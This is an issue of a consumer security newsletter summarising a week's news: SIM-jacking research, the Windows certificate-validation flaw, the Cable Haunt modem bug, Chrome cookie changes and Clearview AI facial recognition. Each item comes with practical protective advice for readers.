Loose Leaf Security Weekly, Issue 18

It's been a busy week in security news, with another reason to avoid SMS-based two-factor authentication and another reason to apply software updates as soon as you can - even on your cable modem. There's good news too, though: ad tracking has gotten significantly less effective, and Google has introduced a new way to secure your account. Also, waiting for software updates is the perfect excuse to make a pot of tea.

If someone forwarded this to you, you can sign up yourself at https://looseleafsecurity.com/newsletter.

Tip of the week

One of our stories this week is new research about ways that attackers can trick your cell phone company into moving your account over to your device, an attack often called "SIM-swapping" or "SIM-jacking." Even apart from this risk, there are good reasons to prefer non-SMS-based two-factor authentication methods. The SMS protocol itself is insecure, and it's not outside the realm of possibility that an attacker could eavesdrop on a text message being sent to you. (We haven't seen any websites offer to send two-factor codes via end-to-end encrypted protocols like iMessage or Signal.) For methods other than SMS, you're usually able to set up multiple two-factor authentication mechanisms and use one as a backup; at the very least, if a site lets you scan a QR code into a code-generator app, you can scan it simultaneously with multiple phones link to our previous tip of the week). If you're traveling or out of good cell range (or even if the cell towers are just congested, which happens occasionally), you might not be able to receive an SMS in a timely fashion. Finally, and most importantly in our opinion, hardware security keys validate the identity of the website before authenticating you, which protects you from phishing attacks - your computer is much less likely to be fooled by a similar-looking URL than you are.

If you have accounts configured for SMS-based two-factor authentication, see if they support multiple methods. Many sites have been adding improved support recently - check out the community-maintained site twofactorauth.org. If you're not sure what sites you've enabled SMS-based authentication on, maybe it's time for some two-factor tidying - take advantage of your password manager's tagging features to make a note of what authentication methods you've got enabled for each site. That way, you can cross-check against updated lists like twofactorauth.org and you also have an easy list of what to update if you get a new phone or a new security key.

In the news

Is SMS 2FA Secure? Researchers from Princeton University have figured out some easy ways for an attacker to trick your phone carrier into giving them access to your account through a SIM-jacking attack. Usually, if you call your cell phone provider and say that your SIM card doesn't work, they'll try to verify your identity in one of a few ways, such as by asking for recent activity on your account. The researchers, playing the role of an attacker, found that they can generate some activity: some carriers will ask about the last time you paid, but there's no authentication on who's allowed to pay for an account, so the attacker could just buy a refill card, apply it to your account, and then call up and describe the transaction. Many carriers also asked about recent outgoing calls, but an attacker could just leave a message asking you to call them back, pretending to be some important organization. Finally, a few carriers didn't even try to secure the reset at all - some asked no questions, and one gave them multiple tries to guess the day of the last payment, even telling them if they were getting closer or farther from the right day.

The researchers tried out the attacks for prepaid accounts with the major US wireless providers (AT&T, T-Mobile, Tracfone, US Mobile, and Verizon) and were able to SIM-jack a test account for all of them. Losing your phone number to an attacker is scary enough and a security problem on its own, but the researchers are framing their work as an attack on SMS-based two-factor authentication, which can be an even worse problem. If your email account is protected by SMS, for instance, an attacker who gains access to your email can proceed to request password resets for probably all your other accounts, such as your online banking account - and they can make it much harder for you to respond to your cell provider and prove that you, not the attacker, should actually have the account.

Whose Curve Is It Anyway? This past "Patch Tuesday" featured a fix for a particularly bad bug in Windows: the logic for validating digital certificates for websites and signed software could be easily fooled. Many recent certificates use an approach called elliptic-curve cryptography, which involves calculations of where lines intersect a function called an elliptic curve. To verify a signature using elliptic-curve cryptography, you need to make sure you have trustworthy information about both the signer's public key, which is a point on the curve, and the curve itself. Unfortunately, while Microsoft's code checked the public key, it could be tricked into calculating the intersection with a different curve, and there's an easy way for an attacker who knows basic algebra to pick a new curve where they can solve for the private key that corresponds to someone else's public key. Cryptographers had warned about the possibility of this mistake as far back as 2004 - it's known as a "domain parameter shifting attack." This week's attack is formally named CVE-2020-0601, though some folks have tried to give it snappier names: security firm Trail of Bits put up a website calling it "Whose Curve Is It Anyway," and security engineer Kenn White has a blog post about it that calls it "Chain of Fools," because the practical effect is that an attacker can make a fake version of a trusted certificate authority and chain their own certificate to the fake authority.

The mistake was originally discovered by the NSA, who found it bad enough that they alerted Microsoft and published a warning about it instead of figuring out how to exploit it for their own ends. If you're running Windows, make sure to apply software updates and reboot as soon as you can, if you haven't already. The math is simple enough that multiple groups, including Trail of Bits, were able to figure out the vulnerability from the NSA's description within a couple of days.

If that's not enough reason to patch your Windows computer, there are also 48 other important security bug fixes in Tuesday's patches. Fortunately, the code that Windows Update uses to validate updates isn't vulnerable to the bug.

Don't forget to patch your cable modem: Researchers at Lyrebirds, a security company in Denmark, have discovered a serious bug in many popular cable modems. The bug, which they call "Cable Haunt," allows any website you visit to exploit your cable modem and take control of the code it runs, possibly using your internet connection for nefarious purposes or even eavesdropping on or messing with your internet traffic. The bug was originally introduced in "reference software" for designing cable modems, and it seems just about all the vendors of cable modems have based their code on the reference software and therefore picked up the bug. If you rent your cable modem from your ISP, you'll need your ISP to apply a firmware update to your cable modem. If you own your modem, you should check the manufacturer's website to see whether an update is available and how to install it. You might want to buy your own cable modem from a company known to reliably provide software updates - since the cable modem protocol is standard, you don't usually need to rent it (and it's often a good bit cheaper over time, too). The website has a list of vulnerable firmware versions; you might be able to see what cable modem firmware you have by visiting http://192.168.1.100 or http://192.168.1.100:8080, which is the internal address most cable modems use - and the login credentials are often built-in default credentials such as "admin" / "password" which you can find with a web search. (If you're so inclined, they also have a sample exploit as a downloadable Python program, but the vulnerability can be exploited just from a website - we think they're just not providing a web version of the exploit to make life a bit harder for people trying to build a real exploit.)

Advanced Protection gets even more advanced: In our episode "Two-factor authentication and account recovery," we briefly discussed Google's Advanced Protection Program. At the time, it involved setting up two security keys (one primary, one backup) as your only second-factor options to log in. Google has now made it possible to enroll in the Advanced Protection Program even if you don't have hardware security keys, as long as you have an Android or iOS phone. Android 7 and up have the ability to act as a security key (which we've discussed previously), and on iOS, you can download the Google Smart Lock app.

The Advanced Protection Program prevents you from using most non-Google apps with your Google account, which is good for security - it prevents you from accidentally authorizing an app to get access to your email or private files, and it also ensures you aren't using apps that save your actual password on disk insecurely. However, if there's a third-party app that you regularly use with your Google account, think carefully about whether you can switch away from it before turning on Advanced Protection. (A few third-party apps, like Thunderbird and Apple Mail, are still allowed.) Advanced Protection also makes it much harder to regain access to your account if you lose your second factor. Again, this is good for security because it prevents someone other than you from breaking in, but we'd strongly suggest you think about your backup options before taking advantage of the new one-click enrollment. Previously, this was the reason they required two security keys. With the new change, they'll let you reconfigure your account settings from another device where you're logged in. According to Mark Risher, Google's director of product management for security and privacy, when you enroll from your phone, they'll check that you're signed in on some other device you can use as a backup, but they still recommend configuring a backup security key. We'd also add that a real security key is useful for protecting your non-Google accounts, so if you turn on Advanced Protection for your Google account, we'd suggest going ahead and ordering one.

Disabling smart doorbells by just asking Software engineer Matthew Garrett took a look at how to attack Ring video doorbells using wifi deauthentication attacks. He found that his walk home inside his large apartment building passed by a neighbor's Ring device, and because he has something of a hobby of finding security holes in Internet-of-Things devices, he decided to get a Ring doorbell of his own and see what he could learn about it. It turns out that it's vulnerable to a straightforward and well-known design flaw in wifi: even on an encrypted network, there's no authentication for the wifi message telling you to disconnect. So anyone who's almost in range of the camera can simply tell the doorbell to leave its wifi network, preventing it from uploading video as they walk by. If you're relying on one of these devices for your own security, the best option is to find a video camera that supports a wired connection, such as over Ethernet: that way nobody can disconnect it without physically unplugging it. Depending on your wifi router, you might be able to enable the 802.11w extension to the wifi protocol for "protected management frames," which adds security to the disconnect message (and some other messages). Better yet, the recent WPA3 standard will include protected management frames by default, so if you're buying new routers and devices in the near future, make sure they support WPA3.

Medical images exposed: Security firm Greenbone Networks has been watching the growing number of unsecured medical image servers on the internet: as of November, they found over a billion images online from over 35 million examinations. Tech news site TechCrunch and patient advocacy site The Mighty took a look at this situation in detail. TechCrunch's article discusses the technical background behind how these images came to be exposed, explaining how images in a standard medical-industry format called DICOM are stored on PACS servers for sharing between medical practitioners, and many medical providers do not set up proper security for their PACS servers. The Mighty has a good discussion of the practical risks and how you can protect yourself. The DICOM format also includes information about the patient in the image, generally including their name and date of birth and often including other identifiers like their social security number. This means that the risk of unprotected images, in addition to leaking your actual medical information, is also a juicy source of information for people committing various types of fraud, from insurance fraud to regular identity theft. They suggest reading your explanation of benefits carefully when your insurance processes a claim, to make sure you're being recorded as having only the treatment you actually had (the same reason you should check your credit reports periodically). They also caution against using email - many medical practices have a "secure messaging system" of some sort, where you log into a website to view data, and even if it's not much more secure than your email, having your medical data behind a website with a login makes it much harder for someone to casually pick up the images while scraping the entire internet. If your doctor's office wants to send you data by email, push back and see if they have other options. More generally, when you're considering going to a new doctor or specialist, ask them about their data privacy practices ahead of time and make it clear to them that this is something you care about as a patient.

It's a Chrome! It's an Edge! Microsoft just released the latest generation of their Edge web browser - now based on Chromium, the open-source core of Google Chrome, instead of Microsoft's own browser engine. The benefits include both increased website compatibility, since websites that work well on Chrome should work well on the new Edge, and a way for Microsoft and Google to join forces on improving the Chromium code. (Last May, The Verge took a deeper look at this surprising decision and at how Microsoft and Google engineers have been working together.) The new Edge browser is available not just for Windows 10, but also for older versions of Windows and even macOS. Hopefully this is the final nail in the coffin for Internet Explorer, which has not kept up with the state of the art in browser security, let alone features and performance - even the former product manager for Internet Explorer wants you to stop using it. Really.

Speaking of Internet Explorer, Microsoft just announced that there's a serious vulnerability in how it handles JavaScript which could enable an attacker to gain control of your account, and moreover, they're aware of "limited targeted attacks" using the vulnerability. The announcement came a few days after Patch Tuesday last week and won't be fixed until next month's Patch Tuesday, so it's all the more reason to stop using Internet Explorer as soon as you can.

I hope they're getting targeted ads for the world's tiniest violin: AppleInsider reports on the sad fortunes of ad tracking companies after the release of iOS 13, which includes Safari's "stunningly effective" Intelligent Tracking Prevention as well as a feature to warn you about apps using your location in the background and confirm that you do want them tracking you. According to one company, 80% of users who upgraded to iOS 13 disabled background tracking, and according to another, the overall number of users sharing their location data has dropped from almost 100% as of three years ago to about 50% today. An executive from one company says, "People have decided to stop their phones' sharing location data at a universal level." Apps can still attempt to guess your location from the source of your internet connection, but the quality of that data is poor.

Chrome can have a few cookies, as a treat: In our episode "Web security continued: cookies, plugins, and extensions," we discussed the benefits and risks of cookies, which are valuable for allowing you to log into websites but can also be a privacy problem. When you load a website with an image or button from another site - an ad or a a "share this on social media" button, perhaps - the web request that loads that image contains any saved cookies for that site. Each advertiser or social media service can use this to track your browsing activity across lots of sites on the web, and if you're logged into the social media site, they can even associate your browsing with your account. Cookies sent to a site that isn't the site you're directly visiting are called "third-party cookies," and some browsers have been disabling them by default - Safari did so in 2017 and Firefox also switched the default last year.

Chrome just announced that they plan to follow suit - but not quite yet. They want to make sure that they're addressing "the needs of users, publishers, and advertisers." They have a reasonable-sounding argument: "By undermining the business model of many ad-supported websites, blunt approaches to cookies encourage the use of opaque techniques such as fingerprinting (an invasive workaround to replace cookies), which can actually reduce user privacy and control." However, it seems fair to note that Google cares quite a bit about not undermining their own business model - for instance, Ars Technica has subheadlined their article, "The ad company wants to protect its revenue model and user privacy at the same time." Chrome's approach, the "Privacy Sandbox," aims to give enough information to advertisers to let them target ads and make sure their ads are effective, but tries to prevent them from building up too much information about your browsing behavior.

Chrome is making another change to cookie behavior in the next version of Chrome, coming out in February: they're restricting whether cookies are sent to websites that haven't specifically asked for third-party cookies. The goal of this change is more security than privacy, since advertisers and other tracking companies can always opt in to cookies being sent. One of the problems with cookies keeping you logged in is, if one website has a link or a form that goes to another website, your cookies are sent along with that request, so if the target website isn't careful, a malicious site can try to take actions on your behalf. (Imagine, for instance, clicking submit on a comment form, where the submit button actually sends the comment over to your Facebook wall or your Twitter feed.) Traditionally, this has required websites to take steps to prevent such "cross-site request forgery" attacks (often abbreviated CSRF or XSRF) by carefully checking where the request comes from. With the new change, websites now need to label cookies as being okay to send on cross-site requests, which should eliminate the vast majority of CSRF attacks, but it carries some risk of breaking older websites - particularly internal corporate websites that haven't had to care much about security isolation across websites within the same company.

Chrome had one last privacy-related announcement last week. Traditionally, web requests have included a header called the "User-Agent," which identifies the exact version number of your browser and your operating system. While this is useful for allowing websites to tailor content to your browser, it's also a significant source of information for fingerprinting, making you easier to track. (It also causes some long-term difficulties for the web platform, in that it permits sites to say things like "Your browser isn't compatible with this site" even if a newer version of your browser actually is compatible.) Chrome is planning to stop changing the User-Agent information with each browser update and eventually hopes to get rid of it, replacing it with a scheme that requires websites to ask if they need specific information about your browser. In order to discourage websites from asking, they hope to introduce a "privacy budget," where your browser can say no if a website has requested too much potentially identifying information.

Chrome apps are going away Many years ago, Google introduced a feature called "Chrome Apps," things you could download via the Chrome store (the same place you download extensions) and which run inside Chrome, but which act more like normal desktop apps. Chrome Apps could make use of a number of powers that weren't allowed to websites or even extensions, like running offline and in the background, making unrestricted network connections, and even running compiled code and not just JavaScript. They were particularly valuable on Chrome OS, which ran only the Chrome web browser and no other apps. Over the years, most of the functionality of Chrome Apps has become available to regular web pages, including the ability to run offline, and Google warned that they'd get rid of Chrome Apps everywhere other than Chrome OS. They've now announced that they're killing off Chrome Apps entirely: this June, they'll stop working on Windows, Mac, and Linux, and in June 2022 they'll also stop working on Chrome OS.

We previously talked about the differing security models of standard desktop apps and websites: desktop apps evolved from single-user and even single-program systems, where there was little reason to restrict what an application could do, but interactive websites evolved from plain web pages, gaining features incrementally and cautiously. While it's been a long time in the making, Google's announcement is a sign that the web platform is just about ready to do everything traditional apps can do, just in a much safer way. For instance, traditional apps (and Chrome apps) can connect to anything they can reach on the network using any protocol, which is certainly useful - it's how browsers themselves work - but it also enables worms and viruses to spread easily. The web platform now has fairly complicated and powerful mechanisms for servers to opt into allowing unrelated websites to access them, but it starts from a baseline of no access: websites can make only very limited contact with servers that don't specifically permit access.

What we're reading

Anti-facial recognition but make it fashion: A topic that keeps coming up in this newsletter is the increasing prevalence of surveillance, and an article in The Seattle Times surveyed some of the ways technologists and artists are innovating with makeup, accessories, and clothing to confuse facial recognition algorithms. (Masks or face-covering scarves would be a likely candidate for avoiding facial scans, but often, anti-mask laws render them impractical.) Two makeup-based defenses are highlighted in the article, both of which we've discussed before in our episode "Security stories: surveillance databases, unlocking apps, unexpected photo booths, and evolving data." First, Juggalo makeup, the clown-inspired black-and-white face paint used by fans of the music group Insane Clown Posse, happens to confuse facial recognition algorithms. For the other, artist Adam Harvey drew inspiration from the way dazzle camouflage on World War I ships obscured depth and size perception for CV Dazzle, which "uses avant-garde hairstyling and makeup designs to break apart the continuity of a face." Leo Selvaggio, another artist, suggests others wear masks of his face in URME Surveillance so that facial recognition incorrectly attributes their actions to him. Trendy mirrored sunglasses can help obscure your eyes, but Reflectacles' IR reflecting glasses can also prevent cameras from seeing nearby parts of your face, further thwarting algorithms from using other facial features to identify you. Finally, the article mentions Kate Rose's t-shirts featuring license plates, which don't work against facial recognition algorithms, but can trick automated license plate readers.

We'd like to also highlight two other anti-facial recognition projects that weren't in The Seattle Times article. First, t-shirts with "abstract" or "trippy" art designed by a team of researchers from Northeastern University, IBM, and MIT can sometimes trick algorithms into not recognizing your body as a person, even if your face is completely unobscured. (Of course, this won't prevent someone from manually reviewing photos and identifying your face later.) Second, artist Joselyn McDonald uses flowers as makeup to obscure key facial features.

Happy goldfish bowl to you, to me, to everyone: There aren't many legal restrictions on facial recognition technology so far, and there certainly don't seem to be very many technical limitations, either. One of the few limitations in practice has been building up a database of people's faces to find matches for a photo - something that's a bit easier for government agencies with access to ID databases but still not particularly extensive. Private companies have fewer options, but someone could create a larger database for a facial recognition system with more reference photos of a wider range of people by scraping social media profiles and other public websites. That's precisely what Clearview AI did: when a photo is uploaded to Clearview, the company runs facial recognition against a database of photos scraped from Facebook, YouTube, Venmo, and millions of other websites and returns photos that are matched and links to the pages that contain those photos. This isn't novel new technology so much as cobbling together a few existing technologies and a willful disregard of scraping prohibitions common to social media sites. (According to the article, Google and Facebook have both built facial recognition from their databases of photos, but both companies have stated those projects have been discontinued.) Hoan Ton-That, Clearview AI's founder, isn't concerned about those terms of service and has told The New York Times, "Facebook knows" - which wouldn't be too surprising as Peter Thiel both is an investor in Clearview and has been on Facebook's board since 2005.

Ton-That did not create Clearview's facial recognition software with an intended audience. In part through offering 30-day free trials to police officers, the product has caught on with law enforcement: over 600 law enforcement agencies are now using Clearview. Photos uploaded by police further expand Clearview's database, which, in turn, increases its appeal for law enforcement agencies that haven't signed up yet. Clearview also markets their app to private security, and this appears to be just the first step to expand Clearview's user base. "Police officers and Clearview's investors predict that its app will eventually be available to the public," the Times says, and Clearview will then be even more ripe for abuse, such as by stalkers to uncover pseudonymous profiles of their victims.

Clearview's unconventional approach to growing its database presents risks not just to the intended targets of facial recognition but to people who look enough like them to confuse the algorithm. Off-the-shelf facial recognition technology has well-known accuracy problems, especially with identifying minorities, and ultimately Clearview's database is coming from photos on social media sites, which have gone through no process to ensure that the names associated with them are accurate. Clearview's customers don't seem to mind that no one has tested the product for false positives, though - the Times quoted one police captain as saying, "For us, the testing was whether it worked or not."

Albert Giradi of Stanford's Center for Internet and Society told the Times, "Absent a very strong federal privacy law, we're all screwed," and we agree. There have been some promising efforts at regulating facial recognition technology: we've covered how a growing number of US cities are banning government use of facial recognition, which should prevent their police departments from using Clearview. The European Union is considering a five-year moratorium on "the use of facial recognition technology in public spaces" to give regulators some time to understand the risks before it gets out of hand, and the US Congress last week continued its hearings on facial recognition technology. Lawmakers of both major US parties are concerned about not just its accuracy problems but the fundamental civil liberty implications: Republican Mark Meadows said that worries about accuracy have "missed the whole argument, because technology is moving at warp speeds," and Democrat Alexandria Ocasio-Cortez called it "some real-life Black Mirror stuff."

Until next time...

Update Windows, update your cable modem (if you can), update other things that can take updates, stop using Internet Explorer, and make sure you use your password manager's strong password generator feature to name your pets. (At least, we assume that's what The New Yorker means - neither your passwords nor the answers to your account recovery questions should be easily guessable things like "Rover" or "Missy.")

That wraps it up for this week - thanks so much for subscribing to our newsletter! If there's a story you'd like us to cover, send us an email at looseleafsecurity@looseleafsecurity.com. See y'all next week!

-Liz & Geoffrey